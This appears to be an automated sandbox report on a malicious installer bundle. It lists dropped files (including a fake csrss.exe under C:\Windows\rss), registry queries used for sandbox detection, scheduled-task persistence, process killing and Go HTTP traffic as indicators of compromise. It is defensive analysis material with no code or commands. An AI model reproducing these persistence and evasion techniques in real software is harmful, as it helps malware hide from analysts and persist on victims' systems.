File opened for modification	C:\Program Files (x86)\IBBrowserInstallerEngine\Borland.Delphi.dll	IBInstaller_97039.tmp
File opened for modification	C:\Program Files (x86)\MaskVPN\mask_svc.exe	vpn.tmp
File created	C:\Program Files (x86)\MaskVPN\driver\win764\is-TU9LB.tmp	vpn.tmp
File opened for modification	C:\Program Files (x86)\Wild-Dew\WinmonProcessMonitor.sys	app.exe
File opened for modification	C:\Program Files (x86)\Wild-Dew\winamp-plugins.7z	app.exe
File created	C:\Program Files (x86)\MaskVPN\driver\winxp32\is-I7GCS.tmp	vpn.tmp
File opened for modification	C:\Program Files (x86)\Wild-Dew\winamp.exe	7za.exe
File created	C:\Program Files (x86)\viewerise\is-LE85I.tmp	vict.tmp
File opened for modification	C:\Program Files (x86)\IBBrowserInstallerEngine\Borland.Studio.Refactoring.dll	IBInstaller_97039.tmp
File created	C:\Program Files (x86)\IBBrowserInstallerEngine\is-0MNC9.tmp	IBInstaller_97039.tmp
File opened for modification	C:\Program Files (x86)\MaskVPN\driver\win732\tapinstall.exe	vpn.tmp
File created	C:\Program Files (x86)\MaskVPN\driver\win732\is-EMFDO.tmp	vpn.tmp
File opened for modification	C:\Program Files (x86)\MaskVPN\libeay32.dll	vpn.tmp
File opened for modification	C:\Program Files (x86)\MaskVPN\MaskVPN.exe	vpn.tmp
File created	C:\Program Files (x86)\MaskVPN\is-FT4CH.tmp	vpn.tmp
File created	C:\Program Files (x86)\Wild-Dew\7zxa.dll	app.exe
File opened for modification	C:\Program Files (x86)\viewerise\unins000.dat	vict.tmp
File created	C:\Program Files (x86)\MaskVPN\driver\winxp32\is-3E17K.tmp	vpn.tmp
File opened for modification	C:\Program Files (x86)\viewerise\unins000.dat	okp5sltpt3j.tmp
File opened for modification	C:\Program Files (x86)\MaskVPN\tunnle.exe	vpn.tmp

Drops file in Windows directory 29 IoCs

Processes:

DrvInst.exeapp.exemultitimer.exemultitimer.exeWerFault.exemultitimer.exemultitimer.exeMicrosoftEdge.exemultitimer.exemultitimer.exemultitimer.exemultitimer.exeDrvInst.exemultitimer.exesvchost.exetapinstall.exe

description	ioc	process
File opened for modification	C:\Windows\inf\oem2.inf	DrvInst.exe
File opened for modification	C:\Windows\rss	app.exe
File created	C:\Windows\Microsoft.NET\Framework64\v2.0.50727\config\security.config.cch.new	multitimer.exe
File created	C:\Windows\Microsoft.NET\Framework64\v2.0.50727\config\enterprisesec.config.cch.new	multitimer.exe
File created	C:\Windows\AppCompat\Programs\Amcache.hve.tmp	WerFault.exe
File created	C:\Windows\Microsoft.NET\Framework64\v2.0.50727\config\security.config.cch.new	multitimer.exe
File created	C:\Windows\Microsoft.NET\Framework64\v2.0.50727\config\security.config.cch.new	multitimer.exe
File opened for modification	C:\Windows\INF\setupapi.dev.log	DrvInst.exe
File created	C:\Windows\inf\oem2.inf	DrvInst.exe
File opened for modification	C:\Windows\Debug\ESE.TXT	MicrosoftEdge.exe
File created	C:\Windows\Microsoft.NET\Framework64\v2.0.50727\config\security.config.cch.new	multitimer.exe
File created	C:\Windows\Microsoft.NET\Framework64\v2.0.50727\config\enterprisesec.config.cch.new	multitimer.exe
File created	C:\Windows\Microsoft.NET\Framework64\v2.0.50727\config\security.config.cch.new	multitimer.exe
File created	C:\Windows\Microsoft.NET\Framework64\v2.0.50727\config\enterprisesec.config.cch.new	multitimer.exe
File created	C:\Windows\Microsoft.NET\Framework64\v2.0.50727\config\enterprisesec.config.cch.new	multitimer.exe
File created	C:\Windows\Microsoft.NET\Framework64\v2.0.50727\config\enterprisesec.config.cch.new	multitimer.exe
File created	C:\Windows\Microsoft.NET\Framework64\v2.0.50727\config\security.config.cch.new	multitimer.exe
File created	C:\Windows\Microsoft.NET\Framework64\v2.0.50727\config\enterprisesec.config.cch.new	multitimer.exe
File created	C:\Windows\INF\oem2.PNF	DrvInst.exe
File created	C:\Windows\Microsoft.NET\Framework64\v2.0.50727\config\security.config.cch.new	multitimer.exe
File created	C:\Windows\Microsoft.NET\Framework64\v2.0.50727\config\security.config.cch.new	multitimer.exe
File created	C:\Windows\Microsoft.NET\Framework64\v2.0.50727\config\enterprisesec.config.cch.new	multitimer.exe
File opened for modification	C:\Windows\INF\setupapi.dev.log	DrvInst.exe
File created	C:\Windows\Microsoft.NET\Framework64\v2.0.50727\config\enterprisesec.config.cch.new	multitimer.exe
File opened for modification	C:\Windows\INF\setupapi.dev.log	svchost.exe
File created	C:\Windows\rss\csrss.exe	app.exe
File created	C:\Windows\Microsoft.NET\Framework64\v2.0.50727\config\security.config.cch.new	multitimer.exe
File opened for modification	C:\Windows\INF\setupapi.dev.log	tapinstall.exe
File created	C:\Windows\Microsoft.NET\Framework64\v2.0.50727\config\enterprisesec.config.cch.new	multitimer.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Program crash 6 IoCs

Processes:

WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exe

pid	pid_target	process	target process
5240	416	WerFault.exe	RegAsm.exe
6044	4804	WerFault.exe
5024	6116	WerFault.exe	RegAsm.exe
5340	4916	WerFault.exe	2565.tmp.exe
6160	4916	WerFault.exe	2565.tmp.exe
4480	4916	WerFault.exe	2565.tmp.exe

Checks SCSI registry key(s) 3 TTPs 64 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

Peripheral Device Discovery

T1120

System Information Discovery

Processes:

tapinstall.exesvchost.exesvchost.exeRegAsm.exeFlP6LqyXbTDa.tmp74qACLReRlGN.exefbwfgasDrvInst.exeDrvInst.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_&PROD_HEARTDISK\4&37CE57BA&0&000000	tapinstall.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_SANU&PROD_SANU_DVD-ROM\4&37CE57BA&0&010000	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0052	svchost.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	RegAsm.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\CompatibleIDs	FlP6LqyXbTDa.tmp
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	74qACLReRlGN.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\004E	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{656a3bb3-ecc0-43fd-8477-4ae0404a96cd}\300A	svchost.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	fbwfgas
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{88ad39db-0d0c-4a38-8435-4043826b5c91}\0008	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0064	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0034	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{3b2ce006-5e61-4fde-bab8-9b8aac9b26df}\0008	svchost.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\ConfigFlags	svchost.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Capabilities	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0018	svchost.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\DeviceDesc	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{3464f7a4-2444-40b1-980a-e0903cb6d912}\0016	svchost.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	74qACLReRlGN.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000	svchost.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\CompatibleIDs	tapinstall.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{656a3bb3-ecc0-43fd-8477-4ae0404a96cd}\2006	svchost.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\HardwareID	FlP6LqyXbTDa.tmp
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0064	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0055	svchost.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	RegAsm.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\CompatibleIDs	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0008	svchost.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Mfg	svchost.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Mfg	svchost.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\FriendlyName	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{656a3bb3-ecc0-43fd-8477-4ae0404a96cd}\2002	svchost.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\LowerFilters	DrvInst.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\HardwareID	tapinstall.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{80d81ea6-7473-4b0c-8216-efc11a2c4c8b}\0002	svchost.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\HardwareID	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0065	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{656a3bb3-ecc0-43fd-8477-4ae0404a96cd}\2003	svchost.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\UpperFilters	DrvInst.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0008\	svchost.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\CompatibleIDs	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\004D	svchost.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Phantom	DrvInst.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\UpperFilters	DrvInst.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\CompatibleIDs	tapinstall.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0003	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0054	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_SANU&PROD_SANU_DVD-ROM\4&37CE57BA&0&010000	FlP6LqyXbTDa.tmp
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{80d81ea6-7473-4b0c-8216-efc11a2c4c8b}\0002	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0005	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009	svchost.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	74qACLReRlGN.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_SANU&PROD_SANU_DVD-ROM\4&37CE57BA&0&010000	DrvInst.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\ConfigFlags	DrvInst.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{3464f7a4-2444-40b1-980a-e0903cb6d912}\000A\	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0004	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0058	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	RegAsm.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\ConfigFlags	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{4340a6c5-93fa-4706-972c-7b648008a5a7}\0008	svchost.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\ConfigFlags	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A	svchost.exe

Checks processor information in registry 2 TTPs 6 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

Processes:

EA85.tmp.exeXaiSp82353Xk.exe7VTSgiw6xogs.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	EA85.tmp.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	EA85.tmp.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	XaiSp82353Xk.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	XaiSp82353Xk.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	7VTSgiw6xogs.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	7VTSgiw6xogs.exe

Creates scheduled task(s) 1 TTPs 16 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exe

pid	process
9132	schtasks.exe
4788	schtasks.exe
6296	schtasks.exe
6416	schtasks.exe
8644	schtasks.exe
4636	schtasks.exe
6508	schtasks.exe
6260	schtasks.exe
3652	schtasks.exe
8892	schtasks.exe
1772	schtasks.exe
9048	schtasks.exe
8884	schtasks.exe
8524	schtasks.exe
3296	schtasks.exe
8424	schtasks.exe

Delays execution with timeout.exe 2 IoCs
evasion

Processes:

timeout.exetimeout.exe

pid process

516 timeout.exe
10956 timeout.exe

pid	process
516	timeout.exe
10956	timeout.exe

Enumerates system info in registry 2 TTPs 21 IoCs

Query Registry

System Information Discovery

Processes:

multitimer.exemultitimer.exemultitimer.exexcopy.exemultitimer.exemultitimer.exemultitimer.exexcopy.exemultitimer.exemultitimer.exemultitimer.exexcopy.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	multitimer.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	multitimer.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	multitimer.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier	xcopy.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	multitimer.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	multitimer.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	multitimer.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier	xcopy.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	multitimer.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	multitimer.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	multitimer.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	multitimer.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	multitimer.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	multitimer.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	multitimer.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier	xcopy.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	multitimer.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	multitimer.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	multitimer.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	multitimer.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	multitimer.exe

GoLang User-Agent 41 IoCs

Uses default user-agent string defined by GoLang HTTP packages.

Processes:

description	flow	ioc
HTTP User-Agent header	38084	Go-http-client/1.1
HTTP User-Agent header	70550	Go-http-client/1.1
HTTP User-Agent header	81068	Go-http-client/1.1
HTTP User-Agent header	91189	Go-http-client/1.1
HTTP User-Agent header	114015	Go-http-client/1.1
HTTP User-Agent header	114017	Go-http-client/1.1
HTTP User-Agent header	144610	Go-http-client/1.1
HTTP User-Agent header	155312	Go-http-client/1.1
HTTP User-Agent header	466	Go-http-client/1.1
HTTP User-Agent header	49331	Go-http-client/1.1
HTTP User-Agent header	91166	Go-http-client/1.1
HTTP User-Agent header	174262	Go-http-client/1.1
HTTP User-Agent header	17047	Go-http-client/1.1
HTTP User-Agent header	132334	Go-http-client/1.1
HTTP User-Agent header	163729	Go-http-client/1.1
HTTP User-Agent header	92668	Go-http-client/1.1
HTTP User-Agent header	102250	Go-http-client/1.1
HTTP User-Agent header	111689	Go-http-client/1.1
HTTP User-Agent header	124992	Go-http-client/1.1
HTTP User-Agent header	154370	Go-http-client/1.1
HTTP User-Agent header	464	Go-http-client/1.1
HTTP User-Agent header	851	Go-http-client/1.1
HTTP User-Agent header	67455	Go-http-client/1.1
HTTP User-Agent header	182798	Go-http-client/1.1
HTTP User-Agent header	183809	Go-http-client/1.1
HTTP User-Agent header	91179	Go-http-client/1.1
HTTP User-Agent header	95689	Go-http-client/1.1
HTTP User-Agent header	161413	Go-http-client/1.1
HTTP User-Agent header	159898	Go-http-client/1.1
HTTP User-Agent header	166590	Go-http-client/1.1
HTTP User-Agent header	166592	Go-http-client/1.1
HTTP User-Agent header	38844	Go-http-client/1.1
HTTP User-Agent header	58872	Go-http-client/1.1
HTTP User-Agent header	121971	Go-http-client/1.1
HTTP User-Agent header	465	Go-http-client/1.1
HTTP User-Agent header	848	Go-http-client/1.1
HTTP User-Agent header	166595	Go-http-client/1.1
HTTP User-Agent header	17050	Go-http-client/1.1
HTTP User-Agent header	852	Go-http-client/1.1
HTTP User-Agent header	16890	Go-http-client/1.1
HTTP User-Agent header	17049	Go-http-client/1.1

Kills process with taskkill 9 IoCs

evasion

Processes:

taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exe

pid	process
7812	taskkill.exe
4776	taskkill.exe
4372	taskkill.exe
7016	taskkill.exe
6860	taskkill.exe
7128	taskkill.exe
640	taskkill.exe
11040	taskkill.exe
11200	taskkill.exe

Modifies Internet Explorer settings 1 TTPs 3 IoCs

adware spyware

Modify Registry

Processes:

MicrosoftEdgeCP.exeMicrosoftEdge.exebrowser_broker.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\Main	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\Main	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\Main	browser_broker.exe

Modifies data under HKEY_USERS 64 IoCs

Processes:

csrss.exeDrvInst.exemask_svc.exeww31.exeapp.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-2511 = "Lord Howe Daylight Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-2412 = "Marquesas Standard Time"	csrss.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\My	DrvInst.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-2531 = "Chatham Islands Daylight Time"	mask_svc.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-242 = "Samoa Standard Time"	mask_svc.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-2371 = "Easter Island Daylight Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-434 = "Georgian Daylight Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-51 = "Greenland Daylight Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-931 = "Coordinated Universal Time"	mask_svc.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-2321 = "Sakhalin Daylight Time"	mask_svc.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-112 = "Eastern Standard Time"	csrss.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	mask_svc.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	ww31.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-111 = "Eastern Daylight Time"	mask_svc.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-449 = "Azerbaijan Standard Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-351 = "FLE Daylight Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-242 = "Samoa Standard Time"	csrss.exe
